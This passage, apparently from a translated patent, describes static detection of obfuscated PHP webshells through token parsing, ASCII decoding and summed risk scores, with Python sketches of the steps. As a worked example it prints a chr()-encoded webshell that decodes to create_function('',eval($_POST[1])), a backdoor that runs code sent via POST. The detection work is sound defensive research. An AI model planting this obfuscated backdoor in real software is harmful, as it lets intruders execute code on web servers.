In the code segment above, when the first "=" is detected, the previously traversed token Tokens[i-1] is obtained and its value (i.e. $_uU) is recorded as the variable to be assigned in the assignment expression currently found. The search then continues for a token Tokens[i+n] whose category is operator and whose value is ";", and the one or more Tokens between Tokens[i] and Tokens[i+n] (i.e. chr(99).chr(104).chr(114)) are recorded as the expression to be evaluated in that assignment expression. By the same reasoning, the code segment above is found to contain the assignment expressions shown in Table 2:
Table 2
Optionally, in step S24, restoring the direct call function and the original call function according to the variable functions and assignment expressions may include the following steps:
Step S241: Look up, in a preset transcoding rule, the direct call function that matches the variable function;
Step S242: Calculate the value corresponding to the variable of each assignment expression, and establish a correspondence between the variable of each assignment expression and its value;
Step S243: Identify the original call function from the direct call function using the preset transcoding rule and the correspondences.
As Table 2 shows, the expression to the right of "=" in the assignment expression "$_uU=chr(99).chr(104).chr(114)" is encoded with ASCII codes (corresponding to the preset transcoding rule above). ASCII uses a specified combination of 7 or 8 bits to represent 128 or 256 possible characters. Standard ASCII, also called basic ASCII, uses 7 bits to represent all uppercase and lowercase letters, the digits 0 to 9, punctuation marks, and the special control characters used in American English (note the difference in bit width: standard ASCII is a 7-bit binary representation). Looking up each decimal code in the ASCII table shows that chr(99) corresponds to the lowercase letter "c", chr(104) to the lowercase letter "h", and chr(114) to the lowercase letter "r". Therefore, in this assignment expression, the value of the expression assigned to the variable $_uU is chr. Similarly, in the assignment expression
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110)
the value of the expression assigned to the variable $_fF is create_function. In the assignment expression
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59)
the value of the expression assigned to the variable $_cC is eval($_POST[1]). Finally, in the assignment expression $_=$_fF("",$_cC), the value of the expression assigned to the variable $_ is create_function("",eval($_POST[1])).
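The ASCII decoding described above can be checked with a short Python sketch. The function name decode_expression is hypothetical; it simply extracts every decimal argument from a concatenation of single-argument calls and maps it to its ASCII character, without checking which function is being called.

```python
import re


def decode_expression(expression):
    """Map every decimal argument in e.g. 'chr(99).chr(104)' to its ASCII character."""
    codes = re.findall(r"\((\d+)\)", expression)
    return "".join(chr(int(code)) for code in codes)


u_expr = "chr(99).chr(104).chr(114)"
f_expr = ("$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95)."
          "$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110)")
c_expr = ("$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80)."
          "$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59)")

print(decode_expression(u_expr))  # chr
print(decode_expression(f_expr))  # create_function
print(decode_expression(c_expr))  # eval($_POST[1]);
```

Note that the last code in the $_cC expression, 59, decodes to a semicolon, so the literal decoded string is "eval($_POST[1]);" with a trailing ";" that the prose leaves out.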
Based on the above analysis, a correspondence can be established between the variable of each assignment expression and its value. Next, from the assignment expression "$_uU=chr(99).chr(104).chr(114)", the direct call function chr can be restored according to the ASCII transcoding rule. Then, using the ASCII transcoding rule and the established correspondences between variables and expression values, the analysis backtracks step by step along $_ → $_fF, $_cC → $_uU until the original call function create_function("",eval($_POST[1])) is obtained. Here eval($_POST[1]) forms the body of the created function and executes code submitted via HTTP POST, so it is evident that create_function("",eval($_POST[1])) has the properties of a malicious webshell.
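The backtracking over variable/value correspondences can be sketched in Python as follows. This is a simplified illustration, not the patent's implementation: it assumes assignments are processed in source order, that concatenation uses "." only between single-argument calls, and that later expressions can be resolved by textual substitution. The names evaluate, backtrack, and encode are hypothetical; encode merely rebuilds the sample expressions.

```python
import re

CHR_CALL = re.compile(r"(\$?\w+)\((\d+)\)")
VARIABLE = re.compile(r"\$\w+")


def evaluate(expression, values):
    """Resolve one right-hand side using the correspondences collected so far."""
    matches = [CHR_CALL.fullmatch(part) for part in expression.split(".")]
    # Case 1: a concatenation of calls that all resolve to chr -> decode via ASCII.
    if all(matches) and all(values.get(m.group(1), m.group(1)) == "chr" for m in matches):
        return "".join(chr(int(m.group(2))) for m in matches)
    # Case 2: substitute every known variable with its recorded value.
    return VARIABLE.sub(lambda m: values.get(m.group(), m.group()), expression)


def backtrack(assignments):
    """Build the variable -> value table from (variable, expression) pairs."""
    values = {}
    for variable, expression in assignments:
        values[variable] = evaluate(expression, values)
    return values


def encode(name, text):
    """Rebuild an obfuscated expression such as chr(99).chr(104).chr(114)."""
    return ".".join(f"{name}({ord(ch)})" for ch in text)


assignments = [
    ("$_uU", encode("chr", "chr")),
    ("$_cC", encode("$_uU", "eval($_POST[1]);")),
    ("$_fF", encode("$_uU", "create_function")),
    ("$_", '$_fF("",$_cC)'),
]
values = backtrack(assignments)
print(values["$_uU"])  # the direct call function
print(values["$_"])    # the restored original call
```

Because the substitution is purely textual, the restored call carries the semicolon contributed by chr(59) inside the argument; a fuller implementation would track string values separately from call syntax.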
Optionally, in step S26, assessing the security of the code file using the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function may include the following steps:
Step S262: Read, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function;
Step S264: Sum the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function to obtain the safety evaluation result.
A comprehensive assessment based on the preset safety coefficient (for example, a preset risk score or safety score) corresponding to the direct call function chr and the preset safety coefficient corresponding to the original call function create_function("",eval($_POST[1])) determines the danger level of the code file (for example, ordinary, moderate, or high). For example, if the risk score corresponding to the direct call function chr is 1 point and the risk score corresponding to the original call function create_function("",eval($_POST[1])) is 3 points, the final safety evaluation result is 4 points. Through this assessment, the above code segment is finally determined to be a high-risk malicious webshell file.
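Steps S262 and S264 amount to a table lookup followed by a sum, as the following Python sketch shows. The scores 1 and 3 come from the example above; the dictionary RISK_SCORES standing in for the preset storage area, the threshold values in LEVELS, and the function name assess are assumptions, since the text does not state where the boundaries between danger levels lie.

```python
# Stand-in for the preset storage area; the two scores come from the example in the text.
RISK_SCORES = {"chr": 1, "create_function": 3}

# Assumed thresholds (not given in the text): total >= 4 is high, >= 2 is moderate.
LEVELS = [(4, "high"), (2, "moderate"), (0, "ordinary")]


def assess(direct_calls, original_calls, scores=RISK_SCORES):
    """Sum the preset coefficients (S264) and map the total to a danger level."""
    total = (sum(scores.get(name, 0) for name in direct_calls)
             + sum(scores.get(name, 0) for name in original_calls))
    level = next(label for threshold, label in LEVELS if total >= threshold)
    return total, level


print(assess(["chr"], ["create_function"]))  # (4, 'high')
```

Unknown function names contribute 0 in this sketch; whether an unlisted function should be treated as harmless is itself a design decision the text leaves open.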
In addition, in the operating environment shown in Fig. 1, the present application also provides another method for assessing code file security, as shown in Fig. 3. Fig. 3 is a flowchart of another method for assessing code file security according to an embodiment of the present invention. As shown in Fig. 3, the method may include the following processing steps:
Step S32: Parse variable functions from the code file to be detected;
Step S34: Restore the direct call function according to the variable functions;
Step S36: Assess the security of the code file using the preset safety coefficient corresponding to the direct call function.
The code file to be detected may or may not contain assignment expressions. For a PHP code file that contains no assignment expressions, the assessment is relatively simple: the direct call function is restored from the PHP code file mainly according to a preset transcoding rule (for example, the ASCII transcoding rule), and the security of the code file is then assessed using the preset safety coefficient corresponding to the direct call function.
In a preferred implementation, the lexical analyzer may draw on the Lua lexer lexical parsing library and the lexical analysis of the PHP Zend module to extract identifiers, comments, numbers, PHP keywords, variables, operators, and special characters from the source program in the code file by regular-expression matching, and then extract all Tokens from the original code file in order of appearance to form the Tokens array. The variable functions are then parsed from the Tokens array.
After the Tokens array is obtained by lexical analysis, each Token in the array can be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because a function call requires parentheses (i.e. "()"), the first task is to find a token Tokens[i] whose category is operator and whose value is a left parenthesis (i.e. "("), which corresponds to the first Token above. Next, once such a Tokens[i] has been found, the previously traversed token Tokens[i-1] is examined to determine whether its category is variable. Then, if the category of Tokens[i-1] is variable, the search continues for a token Tokens[i+n] whose category is operator and whose value is a right parenthesis (corresponding to the second Token above, where n is a positive integer). If the parameter set between the first Token and the second Token matches the preset regular expression, the function currently found is recorded as a variable function. The parameter set only needs to satisfy the matching rule of the PHP regular expression. For example, the parameter set may include, but is not limited to, at least one of the following: letters, digits, underscores, special symbols (for example, $), and parameters passed when a user accesses a PHP web page.
Note that if $ appears together with at least one letter, digit, or underscore, the parameter must begin with $, for example $_POST['aaa']. A parameter set in which $ is not at the beginning, such as a$b, does not satisfy the matching rule of the above PHP regular expression.
It should be noted that, for brevity, each of the foregoing method embodiments is described as a series of combined actions. Those skilled in the art should understand, however, that the present invention is not limited by the described order of actions, because according to the present invention some steps may be performed in another order or simultaneously. Those skilled in the art should also understand that the embodiments described in this specification are preferred embodiments, and that the actions and modules involved are not necessarily required by the present invention.
From the above description of the embodiments, those skilled in the art can clearly understand that the method for assessing code file security according to the above embodiments may be implemented by software plus a necessary general-purpose hardware platform, or by hardware, although the former is the better implementation in many cases. Based on this understanding, the part of the technical solution of the present invention that is essential, or that contributes to the prior art, may be embodied in the form of a software product. The computer software product is stored in a storage medium (such as ROM/RAM, a magnetic disk, or an optical disc) and includes several instructions that cause a terminal device (which may be a mobile phone, a computer, a server, a network device, or the like) to perform the methods described in the embodiments of the present invention.
Embodiment 2
According to an embodiment of the present invention, an embodiment of a device for implementing the above method for assessing code file security is also provided. Fig. 4 is a structural block diagram of a device for assessing code file security according to an embodiment of the present invention. As shown in Fig. 4, the device includes: a parsing module 10, configured to parse variable functions and assignment expressions from the code file to be detected; a restoration module 20, configured to restore the direct call function and the original call function according to the variable functions and assignment expressions; and an evaluation module 30, configured to assess the security of the code file using the preset safety coefficient corresponding to the direct call function and the preset safety coefficient corresponding to the original call function.
The technical solution provided by the embodiments of the present invention can be applied to static webshell detection for PHP scripts. A code file written in PHP is parsed (including lexical analysis and semantic analysis), and variable functions assembled by string concatenation are restored. Code backtracking is then carried out based on the restored direct call function and the assignment expressions in the code file until the original call function is restored, in order to determine whether the code file contains functions commonly used by webshells or dangerous functions. The security of the code file is then assessed using the preset safety coefficient corresponding to the direct call function (for example, the danger level of a commonly used function or dangerous function) and the preset safety coefficient corresponding to the original call function, to determine whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
Optionally, Fig. 5 is a structural block diagram of a device for assessing code file security according to a preferred embodiment of the present invention. As shown in Fig. 5, the parsing module 10 may include: a conversion unit 100, configured to perform lexical analysis on the code file and convert the character string in the code file into a Token sequence; and a parsing unit 102, configured to parse variable functions and assignment expressions from the Token sequence.
Optionally, the parsing unit 102 may include: a first search subunit (not shown), configured to traverse each Token in the Token sequence in a preset order, looking for a first Token whose category is operator and whose value is a left parenthesis; a judgment subunit (not shown), configured to determine, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable; and a first parsing subunit (not shown), configured to, when the output of the judgment subunit is yes, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis and, if the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function, then return to the first search subunit until all variable functions have been parsed.
After the Tokens array is obtained by lexical analysis, each Token in the array can be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because a function call requires parentheses (i.e. "()"), the first task is to find a token Tokens[i] whose category is operator and whose value is a left parenthesis (i.e. "("), which corresponds to the first Token above. Next, once such a Tokens[i] has been found, the previously traversed token Tokens[i-1] is examined to determine whether its category is variable. Then, if the category of Tokens[i-1] is variable, the search continues for a token Tokens[i+n] whose category is operator and whose value is a right parenthesis (corresponding to the second Token above, where n is a positive integer). If the parameter set between the first Token and the second Token matches the preset regular expression, the function currently found is recorded as a variable function. The parameter set only needs to satisfy the matching rule of the PHP regular expression. For example, the parameter set may include, but is not limited to, at least one of the following: letters, digits, underscores, special symbols (for example, $), and parameters passed when a user accesses a PHP web page.
Note that if $ appears together with at least one letter, digit, or underscore, the parameter must begin with $, for example $_POST['aaa']. A parameter set in which $ is not at the beginning, such as a$b, does not satisfy the matching rule of the above PHP regular expression.
Optionally, the parsing unit 102 may include: a second search subunit (not shown), configured to traverse each Token in the Token sequence in a preset order, looking for a third Token whose category is operator and whose value is an equal sign; an obtaining subunit (not shown), configured to obtain, when the third Token is found, the previously traversed Token adjacent to the third Token and record its value as the variable to be assigned in the assignment expression currently found; and a second parsing subunit (not shown), configured to search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the assignment expression currently found, and return to the second search subunit until all assignment expressions have been parsed.
After the Tokens array is obtained by lexical analysis, the difference from parsing variable functions is that an assignment expression is expressed mainly through the equal sign (=). Each Token in the Tokens array can therefore be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because an assignment expression requires an equal sign (i.e. "="), the first task is to find a token Tokens[i] whose category is operator and whose value is an equal sign, which corresponds to the third Token above. Next, the previously traversed token Tokens[i-1] is obtained, and its value is recorded as the variable to be assigned in the assignment expression currently found. Then the search continues for a token Tokens[i+n] whose category is operator and whose value is a semicolon (corresponding to the fourth Token above, where n is a positive integer), and the one or more Tokens between Tokens[i] and Tokens[i+n] are recorded as the expression to be evaluated in the assignment expression currently found.
Optionally, as shown in Fig. 5, the restoration module 20 may include: a first restoration unit 200, configured to look up, in a preset transcoding rule, the direct call function that matches the variable function; a processing unit 202, configured to calculate the value corresponding to the variable of each assignment expression and establish a correspondence between the variable of each assignment expression and its value; and a second restoration unit 204, configured to identify the original call function from the direct call function using the preset transcoding rule and the correspondences.
Optionally, as shown in Fig. 5, the evaluation module 30 may include: a reading unit 300, configured to read, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function; and a calculation unit 302, configured to sum the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function to obtain the safety evaluation result.
According to an embodiment of the present invention, another device embodiment for implementing the above method for assessing code file security is also provided. Fig. 6 is a structural block diagram of another device for assessing code file security according to an embodiment of the present invention. As shown in Fig. 6, the device includes: a parsing module 40, configured to parse variable functions from the code file to be detected; a restoration module 50, configured to restore the direct call function according to the variable functions; and an evaluation module 60, configured to assess the security of the code file using the preset safety coefficient corresponding to the direct call function.
The code file to be detected may or may not contain assignment expressions. For a PHP code file that contains no assignment expressions, the assessment is relatively simple: the direct call function is restored from the PHP code file mainly according to a preset transcoding rule (for example, the ASCII transcoding rule), and the security of the code file is then assessed using the preset safety coefficient corresponding to the direct call function.
Embodiment 3
An embodiment of the present invention may provide a computer terminal, which may be any computer terminal in a group of computer terminals. Optionally, in this embodiment, the computer terminal may also be replaced by a terminal device such as a mobile terminal.
Optionally, in this embodiment, the computer terminal may be located in at least one of a plurality of network devices of a computer network.
Optionally, Fig. 7 is a structural block diagram of a computer terminal according to an embodiment of the present invention. As shown in Fig. 7, the computer terminal may include one or more processors (only one is shown in the figure) and a memory.
The memory may be used to store software programs and modules, such as the program instructions/modules corresponding to the method and device for assessing code file security in the embodiments of the present invention. The processor runs the software programs and modules stored in the memory to execute various functional applications and data processing, thereby implementing the above method for assessing code file security. The memory may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, the memory may further include memory located remotely from the processor, and such remote memory may be connected to the terminal over a network. Examples of such networks include, but are not limited to, the Internet, intranets, local area networks, mobile communication networks, and combinations thereof.
The processor may call, through a transmission device, the information and application programs stored in the memory to perform the following steps:
S1: Parse variable functions and assignment expressions from the code file to be detected;
S2: Restore the direct call function and the original call function according to the variable functions and assignment expressions;
S3: Assess the security of the code file using the preset safety coefficient corresponding to the direct call function and the preset safety coefficient corresponding to the original call function.
Optionally, the processor may also execute program code for the following steps: performing lexical analysis on the code file to convert the character string in the code file into a Token sequence; and parsing variable functions and assignment expressions from the Token sequence.
Optionally, the processor may also execute program code for the following steps. Search step: traverse each Token in the Token sequence in a preset order, looking for a first Token whose category is operator and whose value is a left parenthesis. Judgment step: when the first Token is found, determine whether the category of the previously traversed Token adjacent to the first Token is variable. If so, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis; if the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function. Return to the search step until all variable functions have been parsed.
Optionally, the processor may also execute program code for the following steps. Search step: traverse each Token in the Token sequence in a preset order, looking for a third Token whose category is operator and whose value is an equal sign. Obtaining step: when the third Token is found, obtain the previously traversed Token adjacent to the third Token and record its value as the variable to be assigned in the assignment expression currently found. Then search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, and record them as the expression to be evaluated in the assignment expression currently found. Return to the search step until all assignment expressions have been parsed.
Optionally, the processor may also execute program code for the following steps: looking up, in a preset transcoding rule, the direct call function that matches the variable function; calculating the value corresponding to the variable of each assignment expression and establishing a correspondence between the variable of each assignment expression and its value; and identifying the original call function from the direct call function using the preset transcoding rule and the correspondences.
Optionally, the processor may also execute program code for the following steps: reading, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function; and summing the two safety coefficients to obtain the safety evaluation result.
As another embodiment of the present invention, the processor may also call, through the transmission device, the information and application programs stored in the memory to perform the following steps:
S1: Parse variable functions from the code file to be detected;
S2: Restore the direct call function according to the variable functions;
S3: Assess the security of the code file using the preset safety coefficient corresponding to the direct call function.
With the embodiments of the present invention, variable functions and assignment expressions are parsed from the code file to be detected, the direct call function and the original call function are restored according to the variable functions and assignment expressions, and the security of the code file is assessed using the preset safety coefficient corresponding to the direct call function and the preset safety coefficient corresponding to the original call function. This achieves the technical effect of improving the detection efficiency for variable-function webshell code files and the accuracy of the detection results, and thereby solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
A person of ordinary skill in the art will understand that the structure shown in Fig. 7 is only
illustrative. The terminal may also be a terminal device such as a smartphone (e.g., an Android phone
or an iOS phone), a tablet computer, a palmtop computer, a mobile internet device (Mobile Internet
Device, MID for short), or a PAD. Fig. 7 does not limit the structure of the above electronic device.
For example, the terminal may include more or fewer components than shown in Fig. 7 (such as a network
interface or a display device), or have a configuration different from that shown in Fig. 7.
A person of ordinary skill in the art will understand that all or some of the steps in the methods of
the above embodiments may be completed by a program instructing the hardware related to the terminal
device. The program may be stored in a computer-readable storage medium, and the storage medium may
include a flash disk, read-only memory (Read-Only Memory, ROM for short), random access memory (Random
Access Memory, RAM for short), a magnetic disk, an optical disc, and the like.
Embodiment 4
An embodiment of the present invention further provides a storage medium. Optionally, in this
embodiment, the storage medium may be used to store the program code executed by the method for
assessing code file security provided in Embodiment 1 above.
Optionally, in this embodiment, the storage medium may be located in any computer terminal of a
computer terminal group in a computer network, or in any mobile terminal of a mobile terminal group.
Optionally, in this embodiment, the storage medium is configured to store program code for performing the following steps:
S1: Parse the variable function and the assignment expression from the code file to be detected;
S2: Restore the direct call function and the original call function according to the variable function and the assignment expression;
S3: Assess the security of the code file using the preset security coefficient corresponding to the
direct call function and the preset security coefficient corresponding to the original call function.
Optionally, the above storage medium is also configured to store program code for performing the
following steps: performing lexical analysis on the code file to convert the character sequence in the
code file into a Token sequence; and parsing the variable function and the assignment expression from
the Token sequence.
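The lexical analysis step can be illustrated with a minimal sketch. It assumes a tiny PHP-like token set (variables, string literals, identifiers, numbers, and a few single-character operators); the `Token` type, the category names, and `tokenize` are hypothetical names chosen for illustration and do not come from the patent. A real lexer would recognize many more token classes.

```python
import re
from typing import List, NamedTuple


class Token(NamedTuple):
    kind: str   # token category, e.g. "variable" or "operator"
    value: str  # the matched source text


# Hypothetical token classes; order matters (variables before identifiers).
TOKEN_SPEC = [
    ("variable", r"\$[A-Za-z_]\w*"),
    ("string", r"'[^']*'" + r'|"[^"]*"'),
    ("identifier", r"[A-Za-z_]\w*"),
    ("number", r"\d+"),
    ("operator", r"[()=;.,\[\]]"),
    ("skip", r"\s+"),
]
TOKEN_RE = re.compile("|".join(f"(?P<{kind}>{pattern})" for kind, pattern in TOKEN_SPEC))


def tokenize(code: str) -> List[Token]:
    """Convert a character sequence into a Token sequence."""
    tokens: List[Token] = []
    pos = 0
    while pos < len(code):
        match = TOKEN_RE.match(code, pos)
        if match is None:
            raise ValueError(f"unexpected character {code[pos]!r} at offset {pos}")
        if match.lastgroup != "skip":  # whitespace is dropped
            tokens.append(Token(match.lastgroup, match.group()))
        pos = match.end()
    return tokens
```

For example, `tokenize('$f = "assert"; $f($x);')` yields nine Tokens, in which `$f` has category `variable` and `(` has category `operator`.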
Optionally, the above storage medium is also configured to store program code for performing the
following steps. Search step: traverse each Token in the Token sequence in a preset order and look for
a first Token whose category is operator and whose value is a left parenthesis. Judgment step: when
the first Token is found, determine whether the category of the previously traversed Token adjacent to
the first Token is variable; if so, starting from the first Token, look for a second Token whose
category is operator and whose value is a right parenthesis, and, when the set of parameters between
the first Token and the second Token matches a preset regular expression, record the function
currently found as a variable function and return to the search step, until the variable functions
have been parsed.
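The search and judgment steps can be sketched as a single scan over the Token sequence. This is a minimal sketch under stated assumptions: the `Token` type and category names are hypothetical, and `ARGS_RE` stands in for the "preset regular expression", whose actual content this passage does not give.

```python
import re
from typing import List, NamedTuple, Tuple


class Token(NamedTuple):
    kind: str
    value: str


# Assumed stand-in for the preset regular expression: any argument text
# that contains no parentheses.
ARGS_RE = re.compile(r"^[^()]*$")


def find_variable_functions(tokens: List[Token], args_re=ARGS_RE) -> List[Tuple[str, str]]:
    """Return (variable name, argument text) for each call of the form $var(...)."""
    found = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        # Search step: a first Token that is the operator "(".
        is_open = tok.kind == "operator" and tok.value == "("
        # Judgment step: the previously traversed Token must be a variable.
        if is_open and i > 0 and tokens[i - 1].kind == "variable":
            # Look for a second Token that is the operator ")".
            j = i + 1
            while j < len(tokens) and not (tokens[j].kind == "operator" and tokens[j].value == ")"):
                j += 1
            if j < len(tokens):
                args = "".join(t.value for t in tokens[i + 1:j])
                if args_re.match(args):
                    found.append((tokens[i - 1].value, args))
                i = j  # resume the search after the closing parenthesis
        i += 1
    return found
```

An ordinary call such as `foo($y)` is skipped because the Token before `(` is an identifier rather than a variable.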
Optionally, the above storage medium is also configured to store program code for performing the
following steps. Search step: traverse each Token in the Token sequence in a preset order and look for
a third Token whose category is operator and whose value is an equals sign. Acquisition step: when the
third Token is found, obtain the previously traversed Token adjacent to the third Token, and record
the value of that Token as the variable to be assigned in the assignment expression currently found;
starting from the third Token, look for a fourth Token whose category is operator and whose value is a
semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as
the expression to be calculated in the assignment expression currently found, and return to the search
step, until the assignment expressions have been parsed.
Optionally, the above storage medium is also configured to store program code for performing the
following steps: looking up, in preset transcoding rules, the direct call function that matches the
variable function; calculating the value corresponding to the variable of each assignment expression,
and establishing a correspondence between the variable of each assignment expression and its value;
and using the preset transcoding rules and the correspondence to identify the original call function
from the direct call function.
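The passage does not spell out the format of the transcoding rules, so the following is only one possible reading, offered as a sketch. It assumes that the rules map the names of PHP decoding functions to equivalent Python callables, that the matched rule name plays the role of the direct call function, and that the decoded value of the variable is the original call function. `TRANSCODING_RULES`, `restore`, and the tuple encoding of expressions are all hypothetical.

```python
import base64
import codecs
from typing import Dict, List, Optional, Tuple, Union

# Hypothetical transcoding rules: PHP function name -> Python equivalent.
TRANSCODING_RULES = {
    "base64_decode": lambda s: base64.b64decode(s).decode("utf-8"),
    "str_rot13": lambda s: codecs.decode(s, "rot13"),
    "strrev": lambda s: s[::-1],
}

# An expression is either a plain string value or (function name, literal argument).
Expr = Union[str, Tuple[str, str]]


def restore(variable_function: str,
            assignments: List[Tuple[str, Expr]],
            rules=TRANSCODING_RULES) -> Tuple[Optional[str], Optional[str]]:
    """Return (direct call function, original call function) for one variable function."""
    values: Dict[str, str] = {}     # correspondence: variable -> computed value
    used_rule: Dict[str, str] = {}  # variable -> rule used to compute its value
    for var, expr in assignments:
        if isinstance(expr, tuple):
            name, arg = expr
            if name not in rules:
                continue  # unknown call: leave the variable unresolved
            values[var] = rules[name](arg)
            used_rule[var] = name
        else:
            values[var] = expr
    return used_rule.get(variable_function), values.get(variable_function)
```

Under these assumptions, `restore("$f", [("$f", ("base64_decode", "YXNzZXJ0"))])` resolves the variable function `$f` to the pair `("base64_decode", "assert")`.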
Optionally, the above storage medium is also configured to store program code for performing the
following steps: reading, from a preset storage area, the security coefficient corresponding to the
direct call function and the security coefficient corresponding to the original call function; and
summing the security coefficient corresponding to the direct call function and the security
coefficient corresponding to the original call function to obtain the security assessment result.
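The summation can be sketched as a table lookup followed by a sum. The coefficient values below are invented for illustration, and a dictionary stands in for the preset storage area; how the resulting sum is interpreted (for example, by comparison with a threshold) is not stated in this passage.

```python
from typing import Dict, Iterable

# Hypothetical coefficients standing in for the preset storage area.
SECURITY_COEFFICIENTS: Dict[str, int] = {
    "base64_decode": 2,
    "str_rot13": 2,
    "assert": 5,
    "eval": 5,
}


def assess(direct_calls: Iterable[str],
           original_calls: Iterable[str],
           coefficients: Dict[str, int] = SECURITY_COEFFICIENTS) -> int:
    """Sum the coefficients of the direct call and original call functions."""
    direct_total = sum(coefficients.get(name, 0) for name in direct_calls)
    original_total = sum(coefficients.get(name, 0) for name in original_calls)
    return direct_total + original_total
```

Functions without an entry contribute 0 in this sketch, which is a design choice made here rather than something the source specifies.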
Optionally, in an alternative scheme of this embodiment, the storage medium is configured to store
program code for performing the following steps:
S1: Parse the variable function from the code file to be detected;
S2: Restore the direct call function according to the variable function;
S3: Assess the security of the code file using the preset security coefficient corresponding to the direct call function.
The above embodiments of the present invention are for description only and do not indicate the relative merits of the embodiments.
In the above embodiments of the present invention, the description of each embodiment has its own
emphasis. For a part not described in detail in one embodiment, refer to the related descriptions of other embodiments.
In the several embodiments provided in this application, it should be understood that the disclosed
technical content may be implemented in other ways. The device embodiments described above are only
schematic. For example, the division into units is only a division by logical function, and other
divisions are possible in an actual implementation: multiple units or components may be combined or
integrated into another system, or some features may be omitted or not performed. In addition, the
mutual coupling, direct coupling, or communication connection shown or discussed may be an indirect
coupling or communication connection through some interfaces, units, or modules, and may be electrical
or take other forms.
The units described as separate components may or may not be physically separate, and the components
shown as units may or may not be physical units; that is, they may be located in one place or
distributed over multiple network units. Some or all of the units may be selected according to actual
needs to achieve the purpose of the scheme of this embodiment.
In addition, the functional units in the embodiments of the present invention may be integrated into
one processing unit, each unit may exist physically on its own, or two or more units may be integrated
into one unit. The integrated unit may be implemented in the form of hardware or in the form of a
software functional unit.
If the integrated unit is implemented in the form of a software functional unit and is sold or used as
an independent product, it may be stored in a computer-readable storage medium. Based on this
understanding, the technical scheme of the present invention in essence, or the part that contributes
to the prior art, or all or part of the technical scheme, may be embodied in the form of a software
product. The computer software product is stored in a storage medium and includes several instructions
that cause a computer device (which may be a personal computer, a server, a network device, or the
like) to perform all or some of the steps of the methods described in the embodiments of the present
invention. The aforementioned storage medium includes various media that can store program code, such
as a USB flash drive, read-only memory (ROM, Read-Only Memory), random access memory (RAM, Random
Access Memory), a removable hard disk, a magnetic disk, or an optical disc.
The above are only preferred embodiments of the present invention. It should be noted that a person of
ordinary skill in the art may make several improvements and refinements without departing from the
principles of the present invention, and these improvements and refinements shall also be regarded as
falling within the protection scope of the present invention.
Claims (14)
- 1. A method for assessing the security of a code file, characterized by comprising: parsing a variable function and an assignment expression from a code file to be detected; restoring a direct call function and an original call function according to the variable function and the assignment expression; and assessing the security of the code file using a preset security coefficient corresponding to the direct call function and a preset security coefficient corresponding to the original call function.
- 2. The method according to claim 1, characterized in that parsing the variable function and the assignment expression from the code file comprises: performing lexical analysis on the code file to convert the character sequence in the code file into a Token sequence; and parsing the variable function and the assignment expression from the Token sequence.
- 3. The method according to claim 2, characterized in that parsing the variable function from the Token sequence comprises: a search step: traversing each Token in the Token sequence in a preset order and looking for a first Token whose category is operator and whose value is a left parenthesis; a judgment step: when the first Token is found, determining whether the category of the previously traversed Token adjacent to the first Token is variable; and if so, starting from the first Token, looking for a second Token whose category is operator and whose value is a right parenthesis, and, when the set of parameters between the first Token and the second Token matches a preset regular expression, recording the function currently found as the variable function and returning to the search step, until the variable function has been parsed.
- 4. The method according to claim 2, characterized in that parsing the assignment expression from the Token sequence comprises: a search step: traversing each Token in the Token sequence in a preset order and looking for a third Token whose category is operator and whose value is an equals sign; an acquisition step: when the third Token is found, obtaining the previously traversed Token adjacent to the third Token, and recording the value of the obtained Token as the variable to be assigned in the assignment expression currently found; and starting from the third Token, looking for a fourth Token whose category is operator and whose value is a semicolon, obtaining the one or more Tokens between the third Token and the fourth Token, recording the one or more Tokens as the expression to be calculated in the assignment expression currently found, and returning to the search step, until the assignment expression has been parsed.
- 5. The method according to any one of claims 1 to 4, characterized in that restoring the direct call function and the original call function according to the variable function and the assignment expression comprises: looking up, in preset transcoding rules, the direct call function that matches the variable function; calculating the value corresponding to the variable of each assignment expression, and establishing a correspondence between the variable of each assignment expression and its value; and using the preset transcoding rules and the correspondence to identify the original call function from the direct call function.
- 6. The method according to claim 1, characterized in that assessing the security of the code file using the security coefficient corresponding to the direct call function and the security coefficient corresponding to the original call function comprises: reading, from a preset storage area, the security coefficient corresponding to the direct call function and the security coefficient corresponding to the original call function; and summing the security coefficient corresponding to the direct call function and the security coefficient corresponding to the original call function to obtain a security assessment result.
- 7. A method for assessing the security of a code file, characterized by comprising: parsing a variable function from a code file to be detected; restoring a direct call function according to the variable function; and assessing the security of the code file using a preset security coefficient corresponding to the direct call function.
